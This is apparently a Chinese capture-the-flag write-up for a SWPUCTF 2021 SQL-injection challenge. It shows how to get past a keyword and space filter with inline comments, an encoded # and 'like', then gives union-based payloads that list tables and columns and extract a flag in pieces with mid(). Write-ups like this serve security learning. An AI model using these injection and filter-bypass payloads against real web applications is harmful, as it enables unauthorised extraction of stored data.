[SWPUCTF 2021 新生赛]sql-绕过
首先直接通过wllm=1' 发现有语句报错
之后直接开始手测规则发现屏蔽了
= 空格 + and or <> #
空格的绕过方法很多,但是通过第一轮测试还发现一个问题就是最后的单引号必须为URL编码后的,编码前的通过BP发包过去还是会爆语法错误,具体原因不知道,希望以后有师傅能够解答
1'order/**/by/**/3%23
之后就是走流程,由于版本不是8版本没有table所以用union select
-1'union/**/select/**/1,2,database()%23
-1'union/**/select/**/1,2,group_concat(table_name)from(information_schema.tables)where(table_schema)like'test_db'%23
# 没法用and但是没关系直接爆所有列
-1'union/**/select/**/1,2,group_concat(column_name)from(information_schema.columns)where(table_schema)like'test_db'%23
-1'union/**/select/**/1,2,group_concat(flag)from`LTLT_flag`%23
到最后一步发现只有一部分??
没事测试一啊截断函数,发现sub、left、right都被屏蔽了,只能用mid,之后看wp发现还有reverse函数
mid()、substr()、left()、right()
-1'union/**/select/**/1,2,mid(group_concat(flag),15,15)from`LTLT_flag`%23
-1'union/**/select/**/1,2,mid(group_concat(flag),30,20)from`LTLT_flag`%23
